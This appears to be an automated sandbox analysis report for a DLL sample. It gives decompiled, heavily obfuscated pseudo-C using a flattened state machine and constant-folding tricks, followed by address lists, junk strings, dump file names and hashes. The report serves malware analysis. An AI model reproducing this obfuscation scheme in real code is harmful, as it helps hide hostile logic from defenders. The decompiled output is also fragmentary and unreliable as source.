				 *(_t903 + 0x80) =  *(_t903 + 0x80) * 0x6d;
				 *(_t903 + 0x80) =  *(_t903 + 0x80) ^ 0xffbdaa6d;
				 *(_t903 + 0x44) = 0x660e;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffffa604;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff1443;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) + 0xffff2243;
				 *(_t903 + 0x44) =  *(_t903 + 0x44) ^ 0xfffe0557;
				 *(_t903 + 0xfc) = 0x57ec;
				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) / _t783;
				 *(_t903 + 0xfc) =  *(_t903 + 0xfc) ^ 0x0000115a;
				 *(_t903 + 0x30) = 0x1e40;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) + 0xd54d;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0x10;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) << 0xc;
				 *(_t903 + 0x30) =  *(_t903 + 0x30) ^ 0xd00054ed;
				 *(_t903 + 0xa8) = 0x247b;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0xf4c628ae;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) << 4;
				 *(_t903 + 0xa8) =  *(_t903 + 0xa8) ^ 0x4c6080cc;
				 *(_t903 + 0xa0) = 0x874d;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x714f4b1a;
				_t784 = 0x12;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) / _t784;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x064b94f9;
				 *(_t903 + 0x108) = 0x5442;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) << 0xb;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0x02a2423c;
				 *(_t903 + 0x40) = 0xc63;
				 *(_t903 + 0x40) =  *(_t903 + 0x40) | 0xcf27a650;
				 *(_t903 + 0x40) =  *(_t903 + 0x40) << 4;
				_t785 = 0x69;
				 *(_t903 + 0x3c) =  *(_t903 + 0x40) * 0x42;
				 *(_t903 + 0x3c) =  *(_t903 + 0x3c) ^ 0x83afb13c;
				 *(_t903 + 0xb4) = 0x9ee9;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) / _t785;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71e887;
				 *(_t903 + 0xb4) =  *(_t903 + 0xb4) ^ 0x2c71a0f8;
				 *(_t903 + 0xac) = 0xebb1;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0xffffa53b;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) + 0x1487;
				 *(_t903 + 0xac) =  *(_t903 + 0xac) ^ 0x00009fba;
				 *(_t903 + 0x34) = 0xd0fd;
				_t786 = 0x5a;
				 *(_t903 + 0x38) =  *(_t903 + 0x34) * 0x48;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0x677b;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x39;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0x0d2d2b78;
				 *(_t903 + 0xc0) = 0x7c5c;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) | 0xa19321e3;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) / _t786;
				 *(_t903 + 0xc0) =  *(_t903 + 0xc0) ^ 0x01cbc5b7;
				 *(_t903 + 0x50) = 0x8c18;
				_t787 = 7;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) / _t787;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) << 0xc;
				_t788 = 0x1e;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) * 0x1c;
				 *(_t903 + 0x50) =  *(_t903 + 0x50) ^ 0x23051aa0;
				 *(_t903 + 0x48) = 0x3d7;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x6ad2;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) + 0x792;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) / _t788;
				 *(_t903 + 0x48) =  *(_t903 + 0x48) ^ 0x00005768;
				 *(_t903 + 0xf0) = 0xd2ba;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) << 3;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00069d23;
				 *(_t903 + 0x114) = 0x19d1;
				 *(_t903 + 0x114) =  *(_t903 + 0x114) + 0xffff4333;
				 *(_t903 + 0x114) =  *(_t903 + 0x114) ^ 0xffff39ec;
				 *(_t903 + 0x6c) = 0x599b;
				_t789 = 0x61;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) / _t789;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x240846c0;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x24081360;
				 *(_t903 + 0x28) = 0xb43b;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffffc9d6;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) + 0xffff5756;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) >> 0xe;
				 *(_t903 + 0x28) =  *(_t903 + 0x28) ^ 0x00038714;
				 *(_t903 + 0x20) = 0x2b90;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0x9fcd;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 9;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) << 0xa;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0x000194c5;
				 *(_t903 + 0x104) = 0xeacc;
				 *(_t903 + 0x104) =  *(_t903 + 0x104) << 0x10;
				 *(_t903 + 0x104) =  *(_t903 + 0x104) ^ 0xeacc46e0;
				 *(_t903 + 0x1c) = 0x2e68;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0x15408aca;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xc28f26d4;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) + 0xffff2328;
				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xd7cef55f;
				 *(_t903 + 0x78) = 0x4f9e;
				 *(_t903 + 0x78) =  *(_t903 + 0x78) >> 0xf;
				_t790 = 0xe;
				 *(_t903 + 0x74) =  *(_t903 + 0x78) / _t790;
				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x00003e82;
				 *(_t903 + 0x38) = 0xf8c3;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff0aba;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff96d9;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x36;
				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0xffea86cf;
				 *(_t903 + 0xe8) = 0x47de;
				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f8af4a;
				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f89eb4;
				 *(_t903 + 0x20) = 0x65fb;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 7;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0xfffffa8d;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) * 0x56;
				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0xfffe5494;
				 *(_t903 + 0x6c) = 0x64ca;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xffff11ba;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xc430;
				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x00005014;
				 *(_t903 + 0xa0) = 0x1b33;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) * 0x6c;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) | 0x1aa81449;
				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x1aab14e6;
				 *(_t903 + 0x108) = 0x9e77;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) | 0xd713dbbf;
				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0xd713a936;
				 *(_t903 + 0xf0) = 0x6078;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) + 0xb979;
				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00014992;
				 *(_t903 + 0xe4) = 0x5404;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc0909;
				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc1b10;
				 *(_t903 + 0xdc) = 0xf7f;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) >> 0xd;
				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x00005966;
				 *(_t903 + 0x64) = 0xb834;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) << 1;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 0x10;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 1;
				 *(_t903 + 0x64) =  *(_t903 + 0x64) ^ 0x00004c5c;
				 *(_t903 + 0xd4) = 0x4bcc;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) * 0x53;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69196900;
				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69018755;
				 *(_t903 + 0x84) = 0xe13c;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x2f0c4ec9;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x8c1dd645;
				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0xa31179b0;
				_t791 =  *((intOrPtr*)(_t903 + 0x130));
				 *((intOrPtr*)(_t903 + 0x10)) =  *((intOrPtr*)(_t903 + 0x134));
				 *((intOrPtr*)(_t903 + 0x12c)) = _t791;
				while(1) {
					L1:
					_t865 =  *(_t903 + 0x14);
					while(1) {
						L2:
						_t908 = _t795 - 0x1ac77ed3;
						if(_t908 > 0) {
							goto L30;
						}
						L3:
						if(_t908 == 0) {
							_t890 = _t903 + 0x260;
							_t811 = 6;
							_t901 =  *(_t903 + 0x124) % _t811 + 1;
							__eflags = _t901;
							if(__eflags != 0) {
								__eflags = 1;
								do {
									_t897 = ( *(_t903 + 0x128) & 0x0000000f) + 4;
									E1001087B(_t890,  *((intOrPtr*)(_t903 + 0x130)),  *(_t903 + 0x90), _t897,  *((intOrPtr*)(_t903 + 0x4c)), 1, _t903 + 0x128,  *(_t903 + 0xf8));
									_t903 = _t903 + 0x18;
									_t891 = _t890 + _t897 * 2;
									_t775 = 0x2f;
									 *_t891 = _t775;
									_t890 = _t891 + 2;
									_t901 = _t901 - 1;
									__eflags = _t901;
								} while (__eflags != 0);
								_t791 =  *((intOrPtr*)(_t903 + 0x12c));
								_t892 =  *(_t903 + 0x120);
							}
							_t899 =  *(_t903 + 0x128);
							 *_t890 = 0;
							_t795 = 0x1da9be04;
							_t720 =  *((intOrPtr*)(_t903 + 0x10));
							_t889 =  *(_t903 + 0x140);
							goto L1;
						} else {
							_t909 = _t795 - 0x109a2717;
							if(_t909 > 0) {
								__eflags = _t795 - 0x11ab6705;
								if(_t795 == 0x11ab6705) {
									_push(_t903 + 0x138);
									_push( *(_t903 + 0x3c));
									_push(_t892);
									_t741 = E1000F9BA( *(_t903 + 0x7c));
									_t903 = _t903 + 0xc;
									_t795 = 0xcf94e74;
									__eflags = _t741;
									_t742 = 1;
									_t899 =  !=  ? _t742 : _t899;
									 *(_t903 + 0x128) = _t899;
									goto L16;
								} else {
									__eflags = _t795 - 0x13f4272a;
									if(_t795 == 0x13f4272a) {
										E1000DE81( *((intOrPtr*)(_t903 + 0x10c)),  *((intOrPtr*)(_t903 + 0x148)),  *(_t903 + 0xf0));
										_t795 = 0x1d56e0a8;
										goto L16;
									} else {
										__eflags = _t795 - 0x158b14ad;
										if(_t795 != 0x158b14ad) {
											goto L44;
										} else {
											E1000DE81( *((intOrPtr*)(_t903 + 0x70)),  *((intOrPtr*)(_t903 + 0x150)),  *(_t903 + 0xa0));
											_t795 = 0x13f4272a;
											goto L16;
										}
									}
								}
							} else {
								if(_t909 == 0) {
									_push(0x100014fc);
									_push( *(_t903 + 0x84));
									_push( *(_t903 + 0x68));
									_t745 = E10005DFC( *(_t903 + 0xcc),  *(_t903 + 0x34), __eflags);
									_t905 = _t903 + 0xc;
									_t881 =  *( *0x1002108c + 0x24);
									_push(_t881[3] & 0x000000ff);
									_push(_t745);
									_push(_t881[1] & 0x000000ff);
									_push( *_t881 & 0x000000ff);
									_push( *((intOrPtr*)(_t905 + 0x12c)));
									_push( *((intOrPtr*)(_t905 + 0x5c)));
									_push(( *( *0x1002108c + 0x24))[2] & 0x000000ff);
									_push( *((intOrPtr*)(_t905 + 0xa4)));
									_push( *((intOrPtr*)(_t905 + 0x50)));
									_push( *((intOrPtr*)(_t905 + 0xd4)));
									_push( *((intOrPtr*)(_t905 + 0x80)));
									_push( *((intOrPtr*)(_t905 + 0xbc)));
									_t882 = 0x40;
									E100098C5(_t882, __eflags);
									E10010D6D( *((intOrPtr*)(_t905 + 0xf0)),  *((intOrPtr*)(_t905 + 0xd0)),  *((intOrPtr*)(_t905 + 0x104)), _t745);
									_t903 = _t905 + 0x38;
									_t795 = 0x1ac77ed3;
									_t865 = ( *( *0x1002108c + 0x24))[4] & 0x0000ffff;
									_t720 =  *((intOrPtr*)(_t903 + 0x10));
									 *(_t903 + 0x14) = ( *( *0x1002108c + 0x24))[4] & 0x0000ffff;
									goto L14;
								} else {
									if(_t795 == 0xb3bcfc8) {
										E10017187(_t903 + 0x148, _t903 + 0x1e4, _t903 + 0x14c);
										_pop(_t826);
										asm("sbb ecx, ecx");
										_t795 = (_t826 & 0x278b1eba) + 0x13f4272a;
										goto L16;
									} else {
										if(_t795 == 0xc2454b8) {
											_push( *(_t903 + 0xd4));
											_t828 =  *(_t903 + 0x68);
											goto L48;
										} else {
											if(_t795 == 0xcf94e74) {
												E1000DE81( *((intOrPtr*)(_t903 + 0xec)),  *(_t903 + 0x13c),  *(_t903 + 0x20));
												_t795 = 0x158b14ad;
												L16:
												_t720 =  *((intOrPtr*)(_t903 + 0x10));
												while(1) {
													L1:
													_t865 =  *(_t903 + 0x14);
													goto L2;
												}
											} else {
												if(_t795 != 0xdea8839) {
													L44:
													__eflags = _t795 - 0x32f4d51e;
													if(__eflags != 0) {
														while(1) {
															L1:
															_t865 =  *(_t903 + 0x14);
															goto L2;
														}
													}
												} else {
													_push(_t795);
													_push( *((intOrPtr*)(_t889 + 4)));
													_t894 = E1000A143(_t795);
													_t906 = _t903 + 8;
													_t791 = E100054FB(_t762);
													 *((intOrPtr*)(_t906 + 0x130)) = _t791;
													_t914 = _t791;
													if(_t791 != 0) {
														_t720 = E10005418( *((intOrPtr*)(_t906 + 0xe8)),  *((intOrPtr*)(_t906 + 0xf0)), _t914, _t894,  *((intOrPtr*)(_t906 + 0xb4)),  *_t889,  *((intOrPtr*)(_t889 + 4)), _t791);
														_t903 = _t906 + 0x14;
														 *((intOrPtr*)(_t903 + 0x10)) = _t720;
														if(_t720 == 0) {
															_push( *(_t903 + 0x54));
															_t828 =  *(_t903 + 0x60);
															L48:
															E1000DE81(_t828, _t791);
														} else {
															_t795 = 0x37dee1aa;
															L13:
															_t865 =  *(_t903 + 0x14);
															L14:
															_t892 =  *(_t903 + 0x120);
															L2:
															_t908 = _t795 - 0x1ac77ed3;
															if(_t908 > 0) {
																goto L30;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						L49:
						return _t899;
						L30:
						__eflags = _t795 - 0x1d56e0a8;
						if(_t795 == 0x1d56e0a8) {
							E1000DE81( *(_t903 + 0xe8),  *((intOrPtr*)(_t903 + 0x134)),  *(_t903 + 0xdc));
							_t795 = 0xc2454b8;
							goto L44;
						} else {
							__eflags = _t795 - 0x1da9be04;
							if(__eflags == 0) {
								E10018A33(_t903 + 0x1e0, _t889, __eflags);
								_t795 = 0x2ba7081d;
								goto L16;
							} else {
								__eflags = _t795 - 0x2392656c;
								if(_t795 == 0x2392656c) {
									 *(_t903 + 0x124) = E1000A156();
									_t795 = 0xdea8839;
									goto L16;
								} else {
									__eflags = _t795 - 0x2b46f7ec;
									if(_t795 == 0x2b46f7ec) {
										E1001AA7B(_t903 + 0x138,  *(_t903 + 0xcc),  *(_t903 + 0x110), _t903 + 0x144);
										_pop(_t801);
										asm("sbb ecx, ecx");
										_t795 = (_t801 & 0xf343466f) + 0x1d56e0a8;
										goto L16;
									} else {
										__eflags = _t795 - 0x2ba7081d;
										if(__eflags == 0) {
											_push(0x1000154c);
											_push( *(_t903 + 0x108));
											_push( *((intOrPtr*)(_t903 + 0xa4)));
											_t726 = E10005DFC( *(_t903 + 0x38),  *(_t903 + 0xb0), __eflags);
											_t904 = _t903 + 0xc;
											E1001BAEC(0x400, __eflags,  *((intOrPtr*)(_t904 + 0xd0)), _t726, _t904 + 0x270,  *((intOrPtr*)(_t904 + 0xbc)),  *((intOrPtr*)(_t904 + 0x40)), _t904 + 0x468, _t904 + 0x1e4, _t904 + 0x160);
											E10010D6D( *((intOrPtr*)(_t904 + 0xe4)),  *((intOrPtr*)(_t904 + 0x74)),  *((intOrPtr*)(_t904 + 0x68)), _t726);
											_t720 =  *((intOrPtr*)(_t904 + 0x38));
											_t903 = _t904 + 0x28;
											_t795 = 0xb3bcfc8;
											goto L13;
										} else {
											__eflags = _t795 - 0x37dee1aa;
											if(_t795 == 0x37dee1aa) {
												 *((intOrPtr*)(_t903 + 0x160)) = _t720;
												 *((intOrPtr*)(_t903 + 0x15c)) =  *((intOrPtr*)(_t903 + 0xc68));
												_t807 =  *(_t903 + 0x104);
												 *((intOrPtr*)(_t903 + 0x164)) = _t791;
												E10007B39(_t807,  *(_t903 + 0x98), _t903 + 0x15c, _t903 + 0x134,  *((intOrPtr*)(_t903 + 0xf4)));
												_t903 = _t903 + 0xc;
												asm("sbb ecx, ecx");
												_t795 = (_t807 & 0x1f22a334) + 0xc2454b8;
												goto L16;
											} else {
												__eflags = _t795 - 0x3b7f45e4;
												if(_t795 != 0x3b7f45e4) {
													goto L44;
												} else {
													 *(_t903 + 0x13c) =  *(_t903 + 0x13c) & 0x00000000;
													 *(_t903 + 0x140) =  *(_t903 + 0x84);
													_t809 =  *(_t903 + 0x110);
													E10017BBE(_t903 + 0x488, _t903 + 0x15c,  *((intOrPtr*)(_t903 + 0x130)), _t903 + 0x27c, _t865, _t903 + 0x158,  *(_t903 + 0x78),  *(_t903 + 0x30),  *((intOrPtr*)(_t903 + 0x24)), _t903 + 0x164,  *(_t903 + 0x100));
													_t903 = _t903 + 0x28;
													asm("sbb ecx, ecx");
													_t795 = (_t809 & 0xfc205258) + 0x158b14ad;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
						goto L49;
					}
				}
			}

0x10008008
0x1000800f
0x10008011
0x10008013
0x1000801a
0x10008021
0x10008028
0x1000802f
0x10008030
0x10008031
0x10008036
0x10008041
0x10008044
0x10008058
0x1000805a
0x1000805f
0x10008068
0x1000806d
0x10008076
0x10008081
0x1000808c
0x10008097
0x1000809f
0x100080aa
0x100080b2
0x100080b7
0x100080bf
0x100080c7
0x100080cf
0x100080dc
0x100080df
0x100080e3
0x100080eb
0x100080f3
0x100080fe
0x10008114
0x1000811b
0x10008126
0x1000812e
0x10008136
0x1000813e
0x10008146
0x10008151
0x10008159
0x10008164
0x1000816f
0x10008177
0x10008182
0x1000818d
0x10008198
0x100081a3
0x100081b6
0x100081b7
0x100081be
0x100081c6
0x100081d1
0x100081d9
0x100081de
0x100081ec
0x100081f0
0x100081f8
0x10008205
0x10008211
0x10008216
0x1000821c
0x10008224
0x1000822c
0x10008237
0x1000823e
0x10008249
0x10008254
0x1000825c
0x10008267
0x10008272
0x1000827d
0x10008288
0x10008293
0x1000829e
0x100082a9
0x100082b1
0x100082bc
0x100082c7
0x100082d2
0x100082dd
0x100082ef
0x100082f4
0x10008305
0x10008306
0x1000830d
0x10008318
0x10008320
0x10008328
0x1000832d
0x10008331
0x10008339
0x10008341
0x10008346
0x1000834b
0x10008353
0x1000835b
0x10008366
0x1000836e
0x10008379
0x10008384
0x1000838f
0x10008397
0x1000839f
0x100083aa
0x100083b2
0x100083ba
0x100083c2
0x100083c7
0x100083cf
0x100083da
0x100083e5
0x100083f0
0x100083fb
0x10008403
0x10008411
0x10008415
0x1000841d
0x10008425
0x10008430
0x10008438
0x10008443
0x1000844e
0x10008456
0x1000845e
0x10008466
0x1000846b
0x10008473
0x10008489
0x1000848e
0x10008497
0x100084a2
0x100084ad
0x100084b8
0x100084c3
0x100084ce
0x100084d9
0x100084e4
0x100084ec
0x100084f7
0x10008502
0x1000850d
0x10008515
0x10008520
0x10008533
0x10008536
0x1000853d
0x10008548
0x10008553
0x10008566
0x1000856d
0x10008578
0x10008580
0x10008588
0x10008590
0x10008598
0x100085a0
0x100085b6
0x100085bd
0x100085c8
0x100085d0
0x100085d8
0x100085dd
0x100085e2
0x100085ea
0x100085f5
0x10008600
0x10008608
0x10008613
0x1000861e
0x10008630
0x10008635
0x1000863e
0x10008649
0x10008654
0x1000865c
0x10008667
0x1000866f
0x10008677
0x10008681
0x10008682
0x10008686
0x1000868e
0x100086a2
0x100086a9
0x100086b4
0x100086bf
0x100086ca
0x100086d5
0x100086e0
0x100086ed
0x100086fc
0x100086ff
0x10008703
0x10008710
0x10008714
0x1000871c
0x10008727
0x1000873d
0x10008744
0x1000874f
0x1000875b
0x10008760
0x10008766
0x10008770
0x10008773
0x10008777
0x1000877f
0x10008787
0x1000878f
0x1000879f
0x100087a3
0x100087ab
0x100087b6
0x100087be
0x100087c9
0x100087d4
0x100087df
0x100087ea
0x100087f6
0x100087fb
0x10008801
0x10008809
0x10008811
0x10008819
0x10008821
0x10008829
0x1000882e
0x10008836
0x1000883e
0x10008846
0x1000884b
0x10008850
0x10008858
0x10008863
0x1000886b
0x10008876
0x1000887e
0x10008886
0x1000888e
0x10008896
0x1000889e
0x100088a6
0x100088af
0x100088b2
0x100088b6
0x100088be
0x100088c6
0x100088ce
0x100088db
0x100088df
0x100088e7
0x100088f2
0x100088fd
0x10008908
0x10008910
0x10008915
0x10008922
0x10008926
0x1000892e
0x10008936
0x1000893e
0x10008946
0x1000894e
0x10008961
0x10008968
0x10008973
0x1000897e
0x10008989
0x10008994
0x1000899f
0x100089aa
0x100089b5
0x100089c0
0x100089cb
0x100089d6
0x100089e1
0x100089ec
0x100089f4
0x100089ff
0x10008a07
0x10008a0b
0x10008a10
0x10008a14
0x10008a1c
0x10008a2f
0x10008a36
0x10008a41
0x10008a4c
0x10008a57
0x10008a62
0x10008a6d
0x10008a7f
0x10008a86
0x10008a8a
0x10008a91
0x10008a91
0x10008a91
0x10008a95
0x10008a95
0x10008a95
0x10008a9b
0x00000000
0x00000000
0x10008aa1
0x10008aa1
0x10008d2c
0x10008d37
0x10008d3c
0x10008d3c
0x10008d3d
0x10008d41
0x10008d42
0x10008d62
0x10008d74
0x10008d79
0x10008d7c
0x10008d81
0x10008d82
0x10008d85
0x10008d88
0x10008d88
0x10008d88
0x10008d8b
0x10008d92
0x10008d92
0x10008d99
0x10008da2
0x10008da5
0x10008daa
0x10008dae
0x00000000
0x10008aa7
0x10008aac
0x10008aae
0x10008c8c
0x10008c92
0x10008cf6
0x10008cf7
0x10008d03
0x10008d04
0x10008d09
0x10008d0c
0x10008d11
0x10008d15
0x10008d16
0x10008d19
0x00000000
0x10008c94
0x10008c94
0x10008c9a
0x10008cdf
0x10008ce5
0x00000000
0x10008c9c
0x10008c9c
0x10008ca2
0x00000000
0x10008ca8
0x10008cba
0x10008cc0
0x00000000
0x10008cc0
0x10008ca2
0x10008c9a
0x10008ab4
0x10008ab4
0x10008bcc
0x10008bd1
0x10008bd8
0x10008be7
0x10008bf2
0x10008bf7
0x10008bfe
0x10008c03
0x10008c04
0x10008c08
0x10008c09
0x10008c17
0x10008c27
0x10008c28
0x10008c2f
0x10008c33
0x10008c3a
0x10008c41
0x10008c4a
0x10008c4b
0x10008c66
0x10008c70
0x10008c73
0x10008c7b
0x10008c7f
0x10008c83
0x00000000
0x10008aba
0x10008ac0
0x10008bb4
0x10008bbb
0x10008bbc
0x10008bc4
0x00000000
0x10008ac6
0x10008acc
0x1000901e
0x10009025
0x00000000
0x10008ad2
0x10008ad8
0x10008b8a
0x10008b90
0x10008b95
0x10008b95
0x10008a91
0x10008a91
0x10008a91
0x00000000
0x10008a91
0x10008ade
0x10008ae4
0x10009007
0x10009007
0x1000900d
0x10008a91
0x10008a91
0x10008a91
0x00000000
0x10008a91
0x10008a91
0x10008aea
0x10008b00
0x10008b01
0x10008b0a
0x10008b0c
0x10008b21
0x10008b23
0x10008b2b
0x10008b2d
0x10008b4f
0x10008b54
0x10008b57
0x10008b5d
0x10009014
0x10009018
0x10009029
0x1000902b
0x10008b63
0x10008b63
0x10008b68
0x10008b68
0x10008b6c
0x10008b6c
0x10008a95
0x10008a95
0x10008a9b
0x00000000
0x00000000
0x10008a9b
0x10008b5d
0x10008b2d
0x10008ae4
0x10008ad8
0x10008acc
0x10008ac0
0x10008ab4
0x10008aae
0x10009033
0x1000903d
0x10008dba
0x10008dba
0x10008dc0
0x10008ff8
0x10009002
0x00000000
0x10008dc6
0x10008dc6
0x10008dcc
0x10008fd4
0x10008fd9
0x00000000
0x10008dd2
0x10008dd2
0x10008dd8
0x10008fbc
0x10008fc3
0x00000000
0x10008dde
0x10008dde
0x10008de4
0x10008f94
0x10008f9c
0x10008f9d
0x10008fa5
0x00000000
0x10008dea
0x10008dea
0x10008df0
0x10008ee8
0x10008eed
0x10008ef4
0x10008f06
0x10008f0b
0x10008f4c
0x10008f61
0x10008f66
0x10008f6a
0x10008f6d
0x00000000
0x10008df6
0x10008df6
0x10008dfc
0x10008e9f
0x10008eb5
0x10008ebc
0x10008ec4
0x10008ecb
0x10008ed0
0x10008ed5
0x10008edd
0x00000000
0x10008e02
0x10008e02
0x10008e08
0x00000000
0x10008e0e
0x10008e1c
0x10008e24
0x10008e57
0x10008e6d
0x10008e72
0x10008e77
0x10008e7f
0x00000000
0x10008e7f
0x10008e08
0x10008dfc
0x10008df0
0x10008de4
0x10008dd8
0x10008dcc
0x00000000
0x10008dc0
0x10008a95

Strings

x`, xrefs: 1000899F
x+-, xrefs: 10008714
D2, xrefs: 100083CF
T, xrefs: 100085E2
l}, xrefs: 10008081
F, xrefs: 1000823E
jg, xrefs: 10008473
\|, xrefs: 1000871C
#, xrefs: 10008249
n, xrefs: 1000821C
mb, xrefs: 100084A2
P, xrefs: 1000835B
ti, xrefs: 10008497
7, xrefs: 100081F8
BT, xrefs: 10008649
vj, xrefs: 10008159
<, xrefs: 10008A4C
hW, xrefs: 100087A3
fY, xrefs: 100089F4
{$, xrefs: 100085EA
W, xrefs: 100085A0
h., xrefs: 10008876
$Uf., xrefs: 1000841D
\L, xrefs: 10008A14

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$$Uf.$7$<$BT$D2$\L$\|$fY$h.$hW$jg$l}$mb$ti$vj$x+-$x`${$$F$P$T$W$n
API String ID: 0-3542471488
Opcode ID: 2c314d29b0576a22ed6e6f222fc335ffaada851993f1dd3f5b9d647e1634a526
Instruction ID: 3145125623951c62a106a10f3f5b236ae9f549fa16298d0bb3ac32406a155ffc
Opcode Fuzzy Hash: 2c314d29b0576a22ed6e6f222fc335ffaada851993f1dd3f5b9d647e1634a526
Instruction Fuzzy Hash: 0582F1715097818FE378CF25C889B9FBBE1FB84344F108A1DE5CA862A0D7B59949CF52

Uniqueness

Uniqueness Score: -1.00%

Function 10001806 Relevance: 27.9, Strings: 22, Instructions: 446
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E10001806() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				unsigned int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t499;
				intOrPtr _t511;
				intOrPtr* _t513;
				void* _t516;
				void* _t554;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				intOrPtr* _t578;
				intOrPtr* _t579;
				signed int* _t583;
				void* _t586;

